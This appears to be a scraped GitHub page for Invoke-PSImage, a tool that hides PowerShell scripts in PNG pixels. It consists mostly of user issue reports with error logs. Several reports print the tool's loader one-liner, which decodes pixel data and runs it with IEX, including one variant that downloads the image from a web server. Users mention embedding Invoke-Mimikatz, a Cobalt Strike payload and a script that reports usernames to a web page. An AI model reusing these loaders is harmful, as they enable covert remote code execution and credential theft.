peewpw / invoke-psimage Goto Github PK
View Code? Open in Web Editor NEWEncodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
License: MIT License
Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
License: MIT License
good day sir. when i build a sample file that pop up calculator. sample ps1 file. i followed your steps as explained in the readme. it build the output png successfully. but when i run it , it doesn't trigger anything
Hello I seem to be getting This error: "Invoke-PSImage : Index was outside the bounds of the array.
At line:1 char:1
+ CategoryInfo : OperationStopped: (:) [Invoke-PSImage], IndexOutOfRangeException
+ FullyQualifiedErrorId : System.IndexOutOfRangeException,Invoke-PSImage"
When ever I try to run this test : Invoke-PSImage -Script .\Test.ps1 -Image .\ps_kiwi.png -Out Test-kiwi.png
any help would be golden Thanx
I embeded "shutdown -s -t 0" into a .jpeg and output into .png
But when i open the .png nothing executes
Sorry! My mistake.
Apparently, This tool cannot be used on Powershell installed on Kali Linux even with dotnet installed.
Here's the log:-
PS /root/Invoke-PSImage> Invoke-PSImage -Image ./Small-mario.png -Script ./file.ps1 -O Evil.png
Invoke-PSImage : Unable to find type [System.Web.Security.Membership].
At line:1 char:1
+ Invoke-PSImage -Image ./Small-mario.png -Script ./file.ps1 -O Evil.pn ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Web.Security.Membership:TypeName) [Invoke-PSImage], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound,Invoke-PSImage
After some searching I found out that System.Web.Security.Membership is part of System.Web assembly.
Tried to Add-Type it, same issue..
Then figured out that that Assembly relies on SII, .NET Framework, while on Kali only .NET Core is available, not Framework.
I Submitted this issue just to bring this matter to your knowledge.
So from what I understand in the instructions, you simply provide it a script that you want to execute when an image is opened, and an image, is that correct? If so, I have a file called script.ps1, which essentially just submits back the username of the user logged onto the computer back to a web page. Extremely small script -- approximately 20 lines of code.
I can run this script manually with no problem; however, when trying to embed it into the jpeg file (exported to PNG), nothing happens when opening the PNG file. Of course the PNG looks just fine --
I can see the image, etc. No error is generated either when exporting it. Here's the command that I'm entering:
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -script .\script.ps1 -Image .\image.jpeg -Out .\result.png
Again, running the script from the PowerShell prompt, it works just fine. Taking this same working Powershell script and trying to embed it into the JPEG picture (which is 4252 x 2835) and is significantly smaller than Invoke-Mimikatz, doesn't seem to be doing anything. The JPEG goes from about 3MB to an exported PNG file of about 28.5MB
Can you let me know what I'm doing wrong, if anything? Thanks!
After trying to execute the command, that was generated by the script, i get the:
Exception calling "GetPixel" with "2" argument(s): "Parameter is not valid." At line:1 char:180 sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap("($pwd).path\evil-78.png");$o= a Byte[] 1920;(0..0)|% {foreach($x in (0..1919)){$p=$g.GetPixel <<<< ($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B -band 1 5)*16) -bor ($p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..8])); + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : DotNetMethodException
The command is:
sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g= a System.Drawing.Bitmap(("$pwd).path\evil-78.png");$o= a Byte[] 1920;(0..0)|% {foreach($x in (0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B -band 15)*16) -bor ($p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..8]))
The payload is
Write-Output 123
Testing with 1920*1920 pixel image and Invoke-Mimikatz.ps1
as mentioned on README.md
got this error.
PS C:\Users\admin> sal a New-Object;
Add-Type -AssemblyName "System.Drawing";
$g= a System.Drawing.Bitmap("C:\Users\admin\Desktop\Invoke-PSImage\evil-sexy.png");
$o= a Byte[] 2208000;(0..1149)|% {foreach($x in (0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B -band 15)*16) -bor ($p.G -band 15))}};
$g.Dispose();
IEX([System.Text.Encoding]::ASCII.GetString($o[0..2206859]))
Invoke-Expression : Ampersand not allowed. The & operator is reserved for future use; use "&" to pass ampersand as a string.
At line:6 char:4
+ IEX <<<< ([System.Text.Encoding]::ASCII.GetString($o[0..2206859]))
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : AmpersandNotAllowed,Microsoft.PowerShell.Commands.InvokeExpressionCommand
PS C:\Users\admin> $PSVersionTable
Name Value
---- -----
CLRVersion 2.0.50727.5420
BuildVersion 6.1.7601.17514
PSVersion 2.0
WSManStackVersion 2.0
PSCompatibleVersions {1.0, 2.0}
SerializationVersion 1.1.0.1
PSRemotingProtocolVersion 2.1
May be the same issue as Empire's issue. Error With Ampersand Character in Stager #798.
Update: I dumped the result from [System.Text.Encoding]::ASCII.GetString($o[0..2206859])
. Doesn't looks like IEX()
's argument I think.
00000000: fffe 6600 5d00 3f00 7400 3f00 5600 2000 ..f.].?.t.?.V. .
00000010: 3f00 3f00 6f00 3f00 6200 4d00 3f00 3f00 ?.?.o.?.b.M.?.?.
00000020: 6b00 1f00 5700 0d00 3f00 3000 0a00 3f00 k...W...?.0...?.
00000030: 3f00 0a00 3f00 3f00 4e00 3f00 3f00 4900 ?...?.?.N.?.?.I.
00000040: 3800 2000 0d00 3f00 7600 6900 3200 3f00 8. ...?.v.i.2.?.
00000050: 6300 2f00 3f00 7400 0500 3f00 7600 5700 c./.?.t...?.v.W.
00000060: 1600 6700 5100 3f00 4d00 3f00 3f00 6b00 ..g.Q.?.M.?.?.k.
00000070: 1300 3f00 2000 2500 6300 2000 1900 3f00 ..?. .%.c. ...?.
00000080: 2000 3f00 3f00 6f00 3f00 3f00 5200 5600 .?.?.o.?.?.R.V.
00000090: 3f00 6500 3800 2600 7600 5600 3f00 4900 ?.e.8.&.v.V.?.I.
000000a0: 3f00 3f00 6300 4400 3f00 6e00 0e00 5600 ?.?.c.D.?.n...V.
000000b0: 2000 2800 3f00 6c00 5e00 1700 6900 6500 .(.?.l.^...i.e.
000000c0: 1600 7900 0100 3f00 6100 4200 3f00 6900 ..y...?.a.B.?.i.
000000d0: 3f00 4600 6100 4000 3200 6300 3f00 3f00 [email protected].?.?.
000000e0: 6c00 5c00 3f00 6c00 3f00 3f00 6e00 0900 l.\.?.l.?.?.n...
000000f0: 2600 6d00 3f00 3f00 2e00 0500 5600 6900 &.m.?.?.....V.i.
I've got the conversion portion working, but when the second file is generated, there is no one-line string generated off of the IEX([System.Text.Encoding]::ASCII.GetString variable.
Hello
I tried to run this on a mac but it doesn't embed the script and I don't have an output PNG.
Nota Bene: my input picture is bigger than the script I try to embed it to. (3mb for the JPG and 2.2mb for the script to embed).
here are the commands I ran:
Import-Module .\Invoke-PSImage.ps1
Invoke-PSImage -Script ./Invoke-Mimikatz.ps1 -Out output.jpg -Image ./input.jpg
New-Object: /Users/mac/Documents/Invoke-PSImage/Invoke-PSImage.ps1:95
Line |
95 | $img = New-Object System.Drawing.Bitmap($Image)
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Exception calling ".ctor" with "1" argument(s): "The type initializer for 'Gdip' threw an exception."
So I did like that:
Import-Module .\Invoke-PSImage.ps1
./Invoke-PSImage.ps1 -Script ./Invoke-Mimikatz.ps1 -Out output.jpg -Image ./input.jpg
But I don't obtain an output file. I tried JPG and PNG for the output file,
.\Invoke-PSImage.ps1 -Script .\Invoke-Mimikatz.ps1 -Out out.jpg -Image .\input.jpg
if it may help, I run powershell from a Mac.
Could you please assist me?
$pscmd = "sal a New-Object;Add-Type -AssemblyName "System.Drawing
";$g= a System.Drawing.Bitmap(
"$Out");
$o= a Byte[] $array;(0..$lrows)|% {foreach($x in (0..$lwidth)){
$p=$g.GetPixel(
$x,$_);
$o[$_*$width+
$x]=([math]::Floor(($p.B -band 15)*16) -bor (
$p.G -band 15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString(
$o[0..($lpayload+1)]))"
Hi,
I've tried everything.. changed from a german to an english System also but the one option is I get nothing: no Output in PowerShell, no new Picture, it just jumps to the next line... Then Jacoby (I'm Jacoby) told me to paste the whole script in the Powershell and I get this:
https://github.com/LDByteron/pics/blob/main/Capture.PNG
Can someone please help me?
I used this
PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Image .\kiwi.jpg -Out .\evil-kiwi.png
evil-kiwi.png was created and had lower quality than original (as mentioned) but upon opening nothing happened.
What could be the reason?
Hello, getting a couple errors I cannot resolve. I am able to run the encoding, but my one-liner outputs the following:
PS C:\[path]> sal a New-Object;Add-Type -AssemblyName "System.Drawing";$g=a System.Drawing.Bitmap("C:\[path]\[OutputImage].PNG");$o=a Byte[] 1920;(0..0)|%{foreach($x
in(0..1919)){$p=$g.GetPixel($x,$_);$o[$_*1920+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..557]));
IEX : At line:1 char:8
+ $_Vr??e�B$Q?:Z6r?6e??h??n�? ??o5fa??
+ ~~~~~~~~~~~~~~~~~~~~
Unexpected token '�B$Q?:Z6r?6e??h??n�?' in expression or statement.
At line:6 char:19
+ BnSBo!FcD?y1Fm??t?&c?�s??p8?e?"$#6oJ?o:? K?rM?
+ ~
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double quotation marks ("&") to pass it as part of a string.
At line:6 char:31
+ BnSBo!FcD?y1Fm??t?&c?�s??p8?e?"$#6oJ?o:? K?rM?
+ ~~~~~~~~~~~~~~~~
The string is missing the terminator: ".
At line:1 char:296
+ ... g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..557])); ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ParserError: (:) [Invoke-Expression], ParseException
+ FullyQualifiedErrorId : UnexpectedToken,Microsoft.PowerShell.Commands.InvokeExpressionCommand
There are no ampersands in my .ps1.
I've tried a couple different images with no change.
When running "[IO.File]::ReadAllText("C:\[path]\[InputScript].ps1")
" my script appears perfectly.
Appreciate any help you are able to offer.
chinese
payload.ps1 from cs
evil.png on the web server(192.168.211.1)
PS C:\Users\root\Desktop\Invoke-PSImage-master> Import-Module .\Invoke-PSImage.ps1
PS C:\Users\root\Desktop\Invoke-PSImage-master> Invoke-PSImage -Script .\payload.ps1 -Out .\evil.png -Image .\1.png -Web
sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/evil.png"));$o=a Byte[] 3780;(0..14)|%{foreach($x in(0..251)){$p=$g.GetPixel(
PS C:\Users\root\Desktop\Invoke-PSImage-master> sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).O
penRead("http://192.168.211.1/evil.png"));$o=a Byte[] 3780;(0..14)|%{foreach($x in(0..251)){$p=$g.GetPixel(
loor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3538]))
IEX : 所在位置 行:1 字符: 162
~
不允许使用与号(&)。& 运算符是为将来使用而保留的;请用双引号将与号引起来("&"),以将其作为字符串的一部分传递。
所在位置 行:4 字符: 83
~
表达式中缺少右“)”。
所在位置 行:5 字符: 87
~
表达式中缺少右“)”。
所在位置 行:8 字符: 103
~
表达式或语句中包含意外的标记“)”。
所在位置 行:8 字符: 168
~
参数列表中缺少参量。
所在位置 行:9 字符: 142
~
表达式或语句中包含意外的标记“)”。
所在位置 行:9 字符: 233
~
不允许使用与号(&)。& 运算符是为将来使用而保留的;请用双引号将与号引起来("&"),以将其作为字符串的一部分传递。
所在位置 行:9 字符: 374
~
不允许使用与号(&)。& 运算符是为将来使用而保留的;请用双引号将与号引起来("&"),以将其作为字符串的一部分传递。
所在位置 行:12 字符: 292
~
不允许使用与号(&)。& 运算符是为将来使用而保留的;请用双引号将与号引起来("&"),以将其作为字符串的一部分传递。
所在位置 行:12 字符: 302
~
不允许使用与号(&)。& 运算符是为将来使用而保留的;请用双引号将与号引起来("&"),以将其作为字符串的一部分传递。
并未报告所有分析错误。请更正报告的错误并重试。
所在位置 行:1 字符: 274
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
when i open the .png file is nothing happen anything :(
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.